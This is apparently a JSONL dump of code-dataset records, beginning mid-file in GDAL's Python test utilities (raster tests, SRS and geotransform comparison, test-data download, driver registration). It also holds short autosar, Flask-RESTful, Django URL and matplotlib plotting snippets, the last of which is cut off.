self.testDriver()\n\n wrk_filename = 'data/' + self.filename\n if self.open_options:\n src_ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n src_ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n xsize = src_ds.RasterXSize\n ysize = src_ds.RasterYSize\n\n new_filename = 'tmp/' + self.filename + '.tst'\n new_ds = self.driver.Create(new_filename, xsize, ysize, 1,\n src_ds.GetRasterBand(self.band).DataType,\n options=self.options)\n assert new_ds is not None, 'Failed to create test file using Create method.'\n\n if self.options is None or 'PIXELTYPE=SIGNEDBYTE' not in self.options:\n nodata = 130\n else:\n nodata = 11\n assert new_ds.GetRasterBand(1).SetNoDataValue(nodata) is gdal.CE_None, \\\n 'Failed to set NoData value.'\n\n src_ds = None\n new_ds = None\n\n if delete:\n mode = gdal.GA_Update\n else:\n mode = gdal.GA_ReadOnly\n new_ds = gdal.Open(new_filename, mode)\n assert new_ds is not None, ('Failed to open dataset: ' + new_filename)\n\n assert nodata == new_ds.GetRasterBand(1).GetNoDataValue(), \\\n 'Did not get expected NoData value.'\n\n if delete:\n assert new_ds.GetRasterBand(1).DeleteNoDataValue() == 0, \\\n 'Did not manage to delete nodata value'\n\n new_ds = None\n\n if delete:\n new_ds = gdal.Open(new_filename)\n assert new_ds.GetRasterBand(1).GetNoDataValue() is None, \\\n 'Got nodata value whereas none was expected'\n new_ds = None\n\n if gdal.GetConfigOption('CPL_DEBUG', 'OFF') != 'ON':\n self.driver.Delete(new_filename)\n\n def testSetNoDataValueAndDelete(self):\n return self.testSetNoDataValue(delete=True)\n\n def testSetDescription(self):\n self.testDriver()\n\n wrk_filename = 'data/' + self.filename\n if self.open_options:\n src_ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n src_ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n xsize = src_ds.RasterXSize\n ysize = src_ds.RasterYSize\n\n new_filename = 'tmp/' + self.filename + '.tst'\n new_ds = self.driver.Create(new_filename, xsize, ysize, 1,\n src_ds.GetRasterBand(self.band).DataType,\n options=self.options)\n assert new_ds is not None, 'Failed to create test file using Create method.'\n\n description = \"Description test string\"\n new_ds.GetRasterBand(1).SetDescription(description)\n\n src_ds = None\n new_ds = None\n\n new_ds = gdal.Open(new_filename)\n assert new_ds is not None, ('Failed to open dataset: ' + new_filename)\n\n assert description == new_ds.GetRasterBand(1).GetDescription(), \\\n 'Did not get expected description string.'\n\n new_ds = None\n\n if gdal.GetConfigOption('CPL_DEBUG', 'OFF') != 'ON':\n self.driver.Delete(new_filename)\n\n def testSetUnitType(self):\n self.testDriver()\n\n wrk_filename = 'data/' + self.filename\n if self.open_options:\n src_ds = gdal.OpenEx(wrk_filename, gdal.OF_RASTER, open_options=self.open_options)\n else:\n src_ds = gdal.Open(wrk_filename, gdal.GA_ReadOnly)\n\n xsize = src_ds.RasterXSize\n ysize = src_ds.RasterYSize\n\n new_filename = 'tmp/' + self.filename + '.tst'\n new_ds = self.driver.Create(new_filename, xsize, ysize, 1,\n src_ds.GetRasterBand(self.band).DataType,\n options=self.options)\n assert new_ds is not None, 'Failed to create test file using Create method.'\n\n unit = 'mg/m3'\n assert new_ds.GetRasterBand(1).SetUnitType(unit) is gdal.CE_None, \\\n 'Failed to set unit type.'\n\n src_ds = None\n new_ds = None\n\n new_ds = gdal.Open(new_filename)\n assert new_ds is not None, ('Failed to open dataset: ' + new_filename)\n\n new_unit = new_ds.GetRasterBand(1).GetUnitType()\n if new_unit != unit:\n print('')\n print('old = ', unit)\n print('new = ', new_unit)\n pytest.fail('Did not get expected unit type.')\n\n new_ds = None\n\n if gdal.GetConfigOption('CPL_DEBUG', 'OFF') != 'ON':\n self.driver.Delete(new_filename)\n\n\ndef approx_equal(a, b):\n a = float(a)\n b = float(b)\n if a == 0 and b != 0:\n return 0\n\n if abs(b / a - 1.0) > .00000000001:\n return 0\n return 1\n\n\ndef user_srs_to_wkt(user_text):\n srs = osr.SpatialReference()\n srs.SetFromUserInput(user_text)\n return srs.ExportToWkt()\n\n\ndef equal_srs_from_wkt(expected_wkt, got_wkt):\n expected_srs = osr.SpatialReference()\n expected_srs.ImportFromWkt(expected_wkt)\n\n got_srs = osr.SpatialReference()\n got_srs.ImportFromWkt(got_wkt)\n\n if got_srs.IsSame(expected_srs):\n return 1\n print('Expected:\\n%s' % expected_wkt)\n print('Got: \\n%s' % got_wkt)\n\n post_reason('SRS differs from expected.')\n return 0\n\n###############################################################################\n# Compare two sets of RPC metadata, and establish if they are essentially\n# equivalent or not.\n\n\ndef rpcs_equal(md1, md2):\n\n simple_fields = ['LINE_OFF', 'SAMP_OFF', 'LAT_OFF', 'LONG_OFF',\n 'HEIGHT_OFF', 'LINE_SCALE', 'SAMP_SCALE', 'LAT_SCALE',\n 'LONG_SCALE', 'HEIGHT_SCALE']\n coef_fields = ['LINE_NUM_COEFF', 'LINE_DEN_COEFF',\n 'SAMP_NUM_COEFF', 'SAMP_DEN_COEFF']\n\n for sf in simple_fields:\n\n try:\n if not approx_equal(float(md1[sf]), float(md2[sf])):\n post_reason('%s values differ.' % sf)\n print(md1[sf])\n print(md2[sf])\n return 0\n except:\n post_reason('%s value missing or corrupt.' % sf)\n print(md1)\n print(md2)\n return 0\n\n for cf in coef_fields:\n\n try:\n list1 = md1[cf].split()\n list2 = md2[cf].split()\n\n except:\n post_reason('%s value missing or corrupt.' % cf)\n print(md1[cf])\n print(md2[cf])\n return 0\n\n if len(list1) != 20:\n post_reason('%s value list length wrong(1)' % cf)\n print(list1)\n return 0\n\n if len(list2) != 20:\n post_reason('%s value list length wrong(2)' % cf)\n print(list2)\n return 0\n\n for i in range(20):\n if not approx_equal(float(list1[i]), float(list2[i])):\n post_reason('%s[%d] values differ.' % (cf, i))\n print(list1[i], list2[i])\n return 0\n\n return 1\n\n###############################################################################\n# Test if geotransforms are equal with an epsilon tolerance\n#\n\n\ndef geotransform_equals(gt1, gt2, gt_epsilon):\n for i in range(6):\n if abs(gt1[i] - gt2[i]) > gt_epsilon:\n print('')\n print('gt1 = ', gt1)\n print('gt2 = ', gt2)\n post_reason('Geotransform differs.')\n return False\n return True\n\n\n###############################################################################\n# Download file at url 'url' and put it as 'filename' in 'tmp/cache/'\n#\n# If 'filename' already exits in 'tmp/cache/', it is not downloaded\n# If GDAL_DOWNLOAD_TEST_DATA is not defined, the function fails\n# If GDAL_DOWNLOAD_TEST_DATA is defined, 'url' is downloaded as 'filename' in 'tmp/cache/'\n\ndef download_file(url, filename=None, download_size=-1, force_download=False, max_download_duration=None, base_dir='tmp/cache'):\n\n if filename is None:\n filename = os.path.basename(url)\n elif filename.startswith(base_dir + '/'):\n filename = filename[len(base_dir + '/'):]\n\n try:\n os.stat(base_dir + '/' + filename)\n return True\n except OSError:\n if force_download or download_test_data():\n val = None\n start_time = time.time()\n try:\n handle = gdalurlopen(url)\n if handle is None:\n return False\n if download_size == -1:\n try:\n handle_info = handle.info()\n download_size = int(handle_info['content-length'])\n print('Downloading %s (length = %d bytes)...' % (url, download_size))\n except:\n print('Downloading %s...' % (url))\n else:\n print('Downloading %d bytes from %s...' % (download_size, url))\n except:\n return False\n\n if download_size >= 0:\n sys.stdout.write('Progress: ')\n nLastTick = -1\n val = ''.encode('ascii')\n while len(val) < download_size or download_size < 0:\n chunk_size = 1024\n if download_size >= 0 and len(val) + chunk_size > download_size:\n chunk_size = download_size - len(val)\n try:\n chunk = handle.read(chunk_size)\n except:\n print('Did not get expected data length.')\n return False\n if len(chunk) < chunk_size:\n if download_size < 0:\n break\n print('Did not get expected data length.')\n return False\n val = val + chunk\n if download_size >= 0:\n nThisTick = int(40 * len(val) / download_size)\n while nThisTick > nLastTick:\n nLastTick = nLastTick + 1\n if nLastTick % 4 == 0:\n sys.stdout.write(\"%d\" % int((nLastTick / 4) * 10))\n else:\n sys.stdout.write(\".\")\n nLastTick = nThisTick\n if nThisTick == 40:\n sys.stdout.write(\" - done.\\n\")\n\n current_time = time.time()\n if max_download_duration is not None and current_time - start_time > max_download_duration:\n print('Download aborted due to timeout.')\n return False\n\n try:\n os.stat(base_dir)\n except OSError:\n os.mkdir(base_dir)\n\n try:\n open(base_dir + '/' + filename, 'wb').write(val)\n return True\n except IOError:\n print('Cannot write %s' % (filename))\n return False\n else:\n return False\n\n\n###############################################################################\n# GDAL data type to python struct format\ndef gdal_data_type_to_python_struct_format(datatype):\n type_char = 'B'\n if datatype == gdal.GDT_Int16:\n type_char = 'h'\n elif datatype == gdal.GDT_UInt16:\n type_char = 'H'\n elif datatype == gdal.GDT_Int32:\n type_char = 'i'\n elif datatype == gdal.GDT_UInt32:\n type_char = 'I'\n elif datatype == gdal.GDT_Float32:\n type_char = 'f'\n elif datatype == gdal.GDT_Float64:\n type_char = 'd'\n return type_char\n\n###############################################################################\n# Compare the values of the pixels\n\n\ndef compare_ds(ds1, ds2, xoff=0, yoff=0, width=0, height=0, verbose=1):\n import struct\n\n if width == 0:\n width = ds1.RasterXSize\n if height == 0:\n height = ds1.RasterYSize\n data1 = ds1.GetRasterBand(1).ReadRaster(xoff, yoff, width, height)\n type_char = gdal_data_type_to_python_struct_format(ds1.GetRasterBand(1).DataType)\n val_array1 = struct.unpack(type_char * width * height, data1)\n\n data2 = ds2.GetRasterBand(1).ReadRaster(xoff, yoff, width, height)\n type_char = gdal_data_type_to_python_struct_format(ds2.GetRasterBand(1).DataType)\n val_array2 = struct.unpack(type_char * width * height, data2)\n\n maxdiff = 0.0\n ndiffs = 0\n for i in range(width * height):\n diff = val_array1[i] - val_array2[i]\n if diff != 0:\n # print(val_array1[i])\n # print(val_array2[i])\n ndiffs = ndiffs + 1\n if abs(diff) > maxdiff:\n maxdiff = abs(diff)\n if verbose:\n print(\"Diff at pixel (%d, %d) : %f\" % (i % width, i / width, float(diff)))\n elif ndiffs < 10:\n if verbose:\n print(\"Diff at pixel (%d, %d) : %f\" % (i % width, i / width, float(diff)))\n if maxdiff != 0 and verbose:\n print(\"Max diff : %d\" % (maxdiff))\n print(\"Number of diffs : %d\" % (ndiffs))\n\n return maxdiff\n\n\n###############################################################################\n# Deregister all JPEG2000 drivers, except the one passed as an argument\n\ndef deregister_all_jpeg2000_drivers_but(name_of_driver_to_keep):\n global jp2kak_drv, jpeg2000_drv, jp2ecw_drv, jp2mrsid_drv, jp2openjpeg_drv, jp2lura_drv\n global jp2kak_drv_unregistered, jpeg2000_drv_unregistered, jp2ecw_drv_unregistered, jp2mrsid_drv_unregistered, jp2openjpeg_drv_unregistered, jp2lura_drv_unregistered\n\n # Deregister other potential conflicting JPEG2000 drivers that will\n # be re-registered in the cleanup\n jp2kak_drv = gdal.GetDriverByName('JP2KAK')\n if name_of_driver_to_keep != 'JP2KAK' and jp2kak_drv:\n gdal.Debug('gdaltest', 'Deregistering JP2KAK')\n jp2kak_drv.Deregister()\n jp2kak_drv_unregistered = True\n\n jpeg2000_drv = gdal.GetDriverByName('JPEG2000')\n if name_of_driver_to_keep != 'JPEG2000' and jpeg2000_drv:\n gdal.Debug('gdaltest', 'Deregistering JPEG2000')\n jpeg2000_drv.Deregister()\n jpeg2000_drv_unregistered = True\n\n jp2ecw_drv = gdal.GetDriverByName('JP2ECW')\n if name_of_driver_to_keep != 'JP2ECW' and jp2ecw_drv:\n gdal.Debug('gdaltest.', 'Deregistering JP2ECW')\n jp2ecw_drv.Deregister()\n jp2ecw_drv_unregistered = True\n\n jp2mrsid_drv = gdal.GetDriverByName('JP2MrSID')\n if name_of_driver_to_keep != 'JP2MrSID' and jp2mrsid_drv:\n gdal.Debug('gdaltest.', 'Deregistering JP2MrSID')\n jp2mrsid_drv.Deregister()\n jp2mrsid_drv_unregistered = True\n\n jp2openjpeg_drv = gdal.GetDriverByName('JP2OpenJPEG')\n if name_of_driver_to_keep != 'JP2OpenJPEG' and jp2openjpeg_drv:\n gdal.Debug('gdaltest.', 'Deregistering JP2OpenJPEG')\n jp2openjpeg_drv.Deregister()\n jp2openjpeg_drv_unregistered = True\n\n jp2lura_drv = gdal.GetDriverByName('JP2Lura')\n if name_of_driver_to_keep != 'JP2Lura' and jp2lura_drv:\n gdal.Debug('gdaltest.', 'Deregistering JP2Lura')\n jp2lura_drv.Deregister()\n jp2lura_drv_unregistered = True\n\n return True\n\n###############################################################################\n# Re-register all JPEG2000 drivers previously disabled by\n# deregister_all_jpeg2000_drivers_but\n\n\ndef reregister_all_jpeg2000_drivers():\n global jp2kak_drv, jpeg2000_drv, jp2ecw_drv, jp2mrsid_drv, jp2openjpeg_drv, jp2lura_drv\n global jp2kak_drv_unregistered, jpeg2000_drv_unregistered, jp2ecw_drv_unregistered, jp2mrsid_drv_unregistered, jp2openjpeg_drv_unregistered, jp2lura_drv_unregistered\n\n if jp2kak_drv_unregistered:\n jp2kak_drv.Register()\n jp2kak_drv_unregistered = False\n gdal.Debug('gdaltest', 'Registering JP2KAK')\n\n if jpeg2000_drv_unregistered:\n jpeg2000_drv.Register()\n jpeg2000_drv_unregistered = False\n gdal.Debug('gdaltest', 'Registering JPEG2000')\n\n if jp2ecw_drv_unregistered:\n jp2ecw_drv.Register()\n jp2ecw_drv_unregistered = False\n gdal.Debug('gdaltest', 'Registering JP2ECW')\n\n if jp2mrsid_drv_unregistered:\n jp2mrsid_drv.Register()\n jp2mrsid_drv_unregistered = False\n gdal.Debug('gdaltest', 'Registering JP2MrSID')\n\n if jp2openjpeg_drv_unregistered:\n jp2openjpeg_drv.Register()\n jp2openjpeg_drv_unregistered = False\n gdal.Debug('gdaltest', 'Registering JP2OpenJPEG')\n\n if jp2lura_drv_unregistered:\n jp2lura_drv.Register()\n jp2lura_drv_unregistered = False\n gdal.Debug('gdaltest', 'Registering JP2Lura')\n\n return True\n\n###############################################################################\n# Determine if the filesystem supports sparse files.\n# Currently, this will only work on Linux (or any *NIX that has the stat\n# command line utility)\n\n\ndef filesystem_supports_sparse_files(path):\n\n if skip_on_travis():\n return False\n\n try:\n (ret, err) = runexternal_out_and_err('stat -f -c \"%T\" ' + path)\n except OSError:\n return False\n\n if err != '':\n post_reason('Cannot determine if filesystem supports sparse files')\n return False\n\n if ret.find('fat32') != -1:\n post_reason('File system does not support sparse files')\n return False\n\n if ret.find('wslfs') != -1 or \\\n ret.find('0x53464846') != -1: # wslfs for older stat versions\n post_reason('Windows Subsystem for Linux FS is at the time of ' +\n 'writing not known to support sparse files')\n return False\n\n # Add here any missing filesystem supporting sparse files\n # See http://en.wikipedia.org/wiki/Comparison_of_file_systems\n if ret.find('ext3') == -1 and \\\n ret.find('ext4') == -1 and \\\n ret.find('reiser') == -1 and \\\n ret.find('xfs') == -1 and \\\n ret.find('jfs') == -1 and \\\n ret.find('zfs') == -1 and \\\n ret.find('ntfs') == -1:\n post_reason('Filesystem %s is not believed to support sparse files' % ret)\n return False\n\n return True\n\n###############################################################################\n# Unzip a file\n\n\ndef unzip(target_dir, zipfilename, verbose=False):\n\n try:\n import zipfile\n zf = zipfile.ZipFile(zipfilename)\n except ImportError:\n os.system('unzip -d ' + target_dir + ' ' + zipfilename)\n return\n\n for filename in zf.namelist():\n if verbose:\n print(filename)\n outfilename = os.path.join(target_dir, filename)\n if filename.endswith('/'):\n if not os.path.exists(outfilename):\n os.makedirs(outfilename)\n else:\n outdirname = os.path.dirname(outfilename)\n if not os.path.exists(outdirname):\n os.makedirs(outdirname)\n\n outfile = open(outfilename, 'wb')\n outfile.write(zf.read(filename))\n outfile.close()\n\n return\n\n\nisnan = math.isnan\n\n###############################################################################\n# Return NaN\n\ndef NaN():\n return float('nan')\n\n###############################################################################\n# Return positive infinity\n\n\ndef posinf():\n return float('inf')\n\n###############################################################################\n# Return negative infinity\n\n\ndef neginf():\n return float('-inf')\n\n###############################################################################\n# Has the user requested to dowload test data\ndef download_test_data():\n global count_skipped_tests_download\n val = gdal.GetConfigOption('GDAL_DOWNLOAD_TEST_DATA', None)\n if val != 'yes' and val != 'YES':\n\n if count_skipped_tests_download == 0:\n print('As GDAL_DOWNLOAD_TEST_DATA environment variable is not defined or set to NO, some tests relying on data to downloaded from the Web will be skipped')\n count_skipped_tests_download = count_skipped_tests_download + 1\n\n return False\n return True\n\n###############################################################################\n# Has the user requested to run the slow tests\ndef run_slow_tests():\n global count_skipped_tests_slow\n val = gdal.GetConfigOption('GDAL_RUN_SLOW_TESTS', None)\n if val != 'yes' and val != 'YES':\n\n if count_skipped_tests_slow == 0:\n print('As GDAL_RUN_SLOW_TESTS environment variable is not defined or set to NO, some \"slow\" tests will be skipped')\n count_skipped_tests_slow = count_skipped_tests_slow + 1\n\n return False\n return True\n\n###############################################################################\n# Return true if the platform support symlinks\n\n\ndef support_symlink():\n if sys.platform.startswith('linux'):\n return True\n if sys.platform.find('freebsd') != -1:\n return True\n if sys.platform == 'darwin':\n return True\n if sys.platform.find('sunos') != -1:\n return True\n return False\n\n###############################################################################\n# Return True if the test must be skipped\n\n\ndef skip_on_travis():\n val = gdal.GetConfigOption('TRAVIS', None)\n if val is not None:\n post_reason('Test skipped on Travis')\n return True\n return False\n\n###############################################################################\n# Return True if the provided name is in TRAVIS_BRANCH or BUILD_NAME\n\n\ndef is_travis_branch(name):\n if 'TRAVIS_BRANCH' in os.environ:\n val = os.environ['TRAVIS_BRANCH']\n if name in val:\n return True\n if 'BUILD_NAME' in os.environ:\n val = os.environ['BUILD_NAME']\n if name in val:\n return True\n return False\n\n###############################################################################\n# find_lib_linux()\n# Parse /proc/self/maps to find an occurrence of libXXXXX.so.*\n\n\ndef find_lib_linux(libname):\n\n f = open('/proc/self/maps')\n lines = f.readlines()\n f.close()\n\n for line in lines:\n if line.rfind('/lib' + libname) == -1 or line.find('.so') == -1:\n continue\n\n i = line.find(' ')\n if i < 0:\n continue\n line = line[i + 1:]\n i = line.find(' ')\n if i < 0:\n continue\n line = line[i + 1:]\n i = line.find(' ')\n if i < 0:\n continue\n line = line[i + 1:]\n i = line.find(' ')\n if i < 0:\n continue\n line = line[i + 1:]\n i = line.find(' ')\n if i < 0:\n continue\n line = line[i + 1:]\n\n soname = line.lstrip().rstrip('\\n')\n if soname.rfind('/lib' + libname) == -1:\n continue\n\n return soname\n\n return None\n\n###############################################################################\n# find_lib_sunos()\n# Parse output of pmap to find an occurrence of libXXX.so.*\n\n\ndef find_lib_sunos(libname):\n\n pid = os.getpid()\n lines, _ = runexternal_out_and_err('pmap %d' % pid)\n\n for line in lines.split('\\n'):\n if line.rfind('/lib' + libname) == -1 or line.find('.so') == -1:\n continue\n\n i = line.find('/')\n if i < 0:\n continue\n line = line[i:]\n\n soname = line.lstrip().rstrip('\\n')\n if soname.rfind('/lib' + libname) == -1:\n continue\n\n return soname\n\n return None\n\n###############################################################################\n# find_lib_windows()\n# use Module32First() / Module32Next() API on the current process\n\n\ndef find_lib_windows(libname):\n\n try:\n import ctypes\n except ImportError:\n return None\n\n kernel32 = ctypes.windll.kernel32\n\n MAX_MODULE_NAME32 = 255\n MAX_PATH = 260\n\n TH32CS_SNAPMODULE = 0x00000008\n\n class MODULEENTRY32(ctypes.Structure):\n _fields_ = [\n (\"dwSize\", ctypes.c_int),\n (\"th32ModuleID\", ctypes.c_int),\n (\"th32ProcessID\", ctypes.c_int),\n (\"GlblcntUsage\", ctypes.c_int),\n (\"ProccntUsage\", ctypes.c_int),\n (\"modBaseAddr\", ctypes.c_char_p),\n (\"modBaseSize\", ctypes.c_int),\n (\"hModule\", ctypes.c_void_p),\n (\"szModule\", ctypes.c_char * (MAX_MODULE_NAME32 + 1)),\n (\"szExePath\", ctypes.c_char * MAX_PATH)\n ]\n\n Module32First = kernel32.Module32First\n Module32First.argtypes = [ctypes.c_void_p, ctypes.POINTER(MODULEENTRY32)]\n Module32First.rettypes = ctypes.c_int\n\n Module32Next = kernel32.Module32Next\n Module32Next.argtypes = [ctypes.c_void_p, ctypes.POINTER(MODULEENTRY32)]\n Module32Next.rettypes = ctypes.c_int\n\n CreateToolhelp32Snapshot = kernel32.CreateToolhelp32Snapshot\n CreateToolhelp32Snapshot.argtypes = [ctypes.c_int, ctypes.c_int]\n CreateToolhelp32Snapshot.rettypes = ctypes.c_void_p\n\n CloseHandle = kernel32.CloseHandle\n CloseHandle.argtypes = [ctypes.c_void_p]\n CloseHandle.rettypes = ctypes.c_int\n\n GetLastError = kernel32.GetLastError\n GetLastError.argtypes = []\n GetLastError.rettypes = ctypes.c_int\n\n snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, 0)\n if snapshot is None:\n return None\n\n soname = None\n\n i = 0\n while True:\n entry = MODULEENTRY32()\n entry.dwSize = ctypes.sizeof(MODULEENTRY32)\n pentry = ctypes.pointer(entry)\n if i == 0:\n ret = Module32First(snapshot, pentry)\n else:\n ret = Module32Next(snapshot, pentry)\n i = i + 1\n if ret == 0:\n break\n\n try:\n path = entry.szExePath.decode('latin1')\n except:\n continue\n\n i = path.rfind('\\\\' + libname)\n if i < 0:\n continue\n if path[i + 1:].find('\\\\') >= 0:\n continue\n # Avoid matching gdal_PLUGIN.dll\n if path[i + 1:].find('_') >= 0:\n continue\n soname = path\n break\n\n CloseHandle(snapshot)\n\n return soname\n\n###############################################################################\n# find_lib()\n\n\ndef find_lib(mylib):\n if sys.platform.startswith('linux'):\n return find_lib_linux(mylib)\n if sys.platform.startswith('sunos'):\n return find_lib_sunos(mylib)\n if sys.platform.startswith('win32'):\n return find_lib_windows(mylib)\n # sorry mac users or other BSDs\n # should be doable\n return None\n\n###############################################################################\n# get_opened_files()\n\n\nget_opened_files_has_warned = False\n\n\ndef get_opened_files():\n if not sys.platform.startswith('linux'):\n return []\n fdpath = '/proc/%d/fd' % os.getpid()\n if not os.path.exists(fdpath):\n global get_opened_files_has_warned\n if not get_opened_files_has_warned:\n get_opened_files_has_warned = True\n print('get_opened_files() not supported due to /proc not being readable')\n return []\n file_numbers = os.listdir(fdpath)\n filenames = []\n for fd in file_numbers:\n try:\n filename = os.readlink('%s/%s' % (fdpath, fd))\n if not filename.startswith('/dev/') and not filename.startswith('pipe:') and filename.find('proj.db') < 0:\n filenames.append(filename)\n except OSError:\n pass\n return filenames\n\n###############################################################################\n# is_file_open()\n\n\ndef is_file_open(filename):\n for got_filename in get_opened_files():\n if filename in got_filename:\n return True\n return False\n\n###############################################################################\n# built_against_curl()\n\n\ndef built_against_curl():\n return gdal.GetDriverByName('HTTP') is not None\n\n###############################################################################\n# error_handler()\n# Allow use of \"with\" for an ErrorHandler that always pops at the scope close.\n# Defaults to suppressing errors and warnings.\n\n\n@contextlib.contextmanager\ndef error_handler(error_name='CPLQuietErrorHandler'):\n handler = gdal.PushErrorHandler(error_name)\n try:\n yield handler\n finally:\n gdal.PopErrorHandler()\n\n###############################################################################\n# Temporarily define a new value of block cache\n\n\n@contextlib.contextmanager\ndef SetCacheMax(val):\n oldval = gdal.GetCacheMax()\n gdal.SetCacheMax(val)\n try:\n yield\n finally:\n gdal.SetCacheMax(oldval)\n\n###############################################################################\n# Temporarily define a configuration option\n\n\n@contextlib.contextmanager\ndef config_option(key, val):\n oldval = gdal.GetConfigOption(key)\n gdal.SetConfigOption(key, val)\n try:\n yield\n finally:\n gdal.SetConfigOption(key, oldval)\n\n###############################################################################\n# Temporarily define a set of configuration options\n\n\n@contextlib.contextmanager\ndef config_options(options):\n oldvals = {key: gdal.GetConfigOption(key) for key in options}\n for key in options:\n gdal.SetConfigOption(key, options[key])\n try:\n yield\n finally:\n for key in options:\n gdal.SetConfigOption(key, oldvals[key])\n\n###############################################################################\n# Temporarily create a file\n\n\n@contextlib.contextmanager\ndef tempfile(filename, content):\n gdal.FileFromMemBuffer(filename, content)\n try:\n yield\n finally:\n gdal.Unlink(filename)\n\n###############################################################################\n# Temporarily enable exceptions\n\n\n@contextlib.contextmanager\ndef enable_exceptions():\n if gdal.GetUseExceptions():\n try:\n yield\n finally:\n pass\n return\n\n gdal.UseExceptions()\n try:\n yield\n finally:\n gdal.DontUseExceptions()\n\n\n###############################################################################\nrun_func = gdaltestaux.run_func\nurlescape = gdaltestaux.urlescape\ngdalurlopen = gdaltestaux.gdalurlopen\nspawn_async = gdaltestaux.spawn_async\nwait_process = gdaltestaux.wait_process\nrunexternal = gdaltestaux.runexternal\nread_in_thread = gdaltestaux.read_in_thread\nrunexternal_out_and_err = gdaltestaux.runexternal_out_and_err\n","sub_path":"autotest/pymod/gdaltest.py","file_name":"gdaltest.py","file_ext":"py","file_size_in_byte":58642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"315198664","text":"import autosar\r\n\r\nws = autosar.workspace()\r\npackage=ws.createPackage(\"DataType\", role=\"DataType\")\r\npackage.createSubPackage('DataTypeSemantics', role='CompuMethod')\r\npackage.createSubPackage('DataTypeUnits', role='Unit')\r\npackage.createIntegerDataType('InactiveActive_T',valueTable=[\r\n 'InactiveActive_Inactive',\r\n 'InactiveActive_Active',\r\n 'InactiveActive_Error',\r\n 'InactiveActive_NotAvailable'])\r\n\r\nws.saveXML('DataTypes.arxml', packages=['DataType'])\r\n\r\nws2 = autosar.workspace()\r\nws2.loadXML('DataTypes.arxml')\r\nprint(ws2['DataType/InactiveActive_T'].name)","sub_path":"examples/autosar3/package/enum_integer_type.py","file_name":"enum_integer_type.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"348384759","text":"from flask import request, url_for\nfrom flask_restful import Resource\nfrom data.models import db, Task, TaskSchema\nfrom utils.settings import API_ITEMS_PER_PAGE\n\n\ntasks_schema = TaskSchema(many=True)\ntask_schema = TaskSchema()\n\n\nclass ListCreateTask(Resource):\n def get(self):\n # Get the total count of tasks\n count = len(Task.query.all())\n\n # Get the page parameter from URL if present\n args = request.args\n if args:\n page = args.get('page', 1, type=int)\n\n # Returns API_ITEMS_PER_PAGE items per page\n # W3rd arg sets error_out to false\n paginated_tasks = Task.query.paginate(page, API_ITEMS_PER_PAGE, False)\n\n # serializing the Task items\n results = tasks_schema.dump(paginated_tasks.items)\n\n \"\"\"\n Getting the next and previous urls by checking and setting the next and previous page num\n has_next ==> True if next page exists\n has_prev ==> True if previous page exists\n next_num ==> number of the next page\n prev_num ==> number of thr previous page\n \"\"\"\n next_url = url_for('api_bp.tasks', page=paginated_tasks.next_num) \\\n if paginated_tasks.has_next else None\n\n prev_url = url_for('api_bp.tasks', page=paginated_tasks.prev_num) \\\n if paginated_tasks.has_prev else None\n\n # Getting the total number of pages\n total_pages = paginated_tasks.pages\n\n return {'count': count, 'pages': total_pages, 'next': next_url, 'prev': prev_url, 'results': results}, 200\n\n \"\"\"\n If no page arg present in the URL,\n set the default page to 1 and paginate the results\n \"\"\"\n page = 1\n tasks = Task.query.paginate(page, API_ITEMS_PER_PAGE, False)\n # serializing the Tasks\n results = tasks_schema.dump(tasks.items)\n\n next_url = url_for('api_bp.tasks', page=tasks.next_num) \\\n if tasks.has_next else None\n\n prev_url = url_for('api_bp.tasks', page=tasks.prev_num) \\\n if tasks.has_prev else None\n\n total_pages = tasks.pages\n\n return {'count': count, 'pages': total_pages, 'next': next_url, 'prev': prev_url, 'results': results}, 200\n\n def post(self):\n request_data = request.get_json(force=True)\n # print(request_data)\n if not request_data:\n return {'message': 'post body required'}, 400\n\n # validate input\n errors = task_schema.validate(request_data)\n # print(errors)\n if errors:\n return errors, 422\n\n task = Task.query.filter_by(name=request_data['name']).first()\n if task:\n return {'message': 'A task with name {} already exists'.format(request_data['name'])}, 400\n\n new_task = Task(**request_data)\n db.session.add(new_task)\n db.session.commit()\n\n result = task_schema.dump(new_task)\n\n return result, 201\n\n","sub_path":"resources/ListCreateTask.py","file_name":"ListCreateTask.py","file_ext":"py","file_size_in_byte":2993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"439903228","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom blogapp import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('', views.index, name='index'),\n path('blog/', views.detail, name='detail'),\n path('blog/new/', views.new, name='new'),\n path('blog/create/', views.create, name='create'),\n path('blog/', include('blogapp.urls')),\n]\n","sub_path":"blogproject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"347459098","text":"#!/usr/bin/python\n\nimport sys, os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom math import log\n\nplt.rcParams.update({'font.size': 14})\n\nfilename = sys.argv[1]\n\nfile1 = open(filename, 'r') \nLines = file1.readlines() \n\nfor line in Lines: \n line_curr = line.strip()\n #print(line_curr)\n\nfib_ref=Lines[1:2]\nfib_adapt=Lines[3:12]\nfib_discrete=Lines[13:23]\n\n#print(fib_ref)\n#print(fib_adapt)\n#print(fib_discrete)\n\nUref = fib_ref[0].strip().split()[0];\n#print(Uref)\n\nU_adapt = np.array([])\nt_adapt = np.array([])\nt_adapt2 = np.array([])\n\nfac = 1.0/log(10);\n\nfor line in fib_adapt:\n\t\tU = line.strip().split()[0]\n\t\tt = line.strip().split()[2]\n\t\tts = line.strip().split()[3]\n\t\tU_adapt = np.append(U_adapt,[abs(float(U)-float(Uref))])\n\t\tt_adapt = np.append(t_adapt,[float(t)])\n\t\tt_adapt2 = np.append(t_adapt2,[float(ts)])\n\nU_discrete = np.array([])\nt_discrete = np.array([])\nt_discrete2 = np.array([])\n\nfor line in fib_discrete:\n\t\tU = line.strip().split()[0]\n\t\tt = line.strip().split()[2]\n\t\tts = line.strip().split()[3]\n\t\tU_discrete = 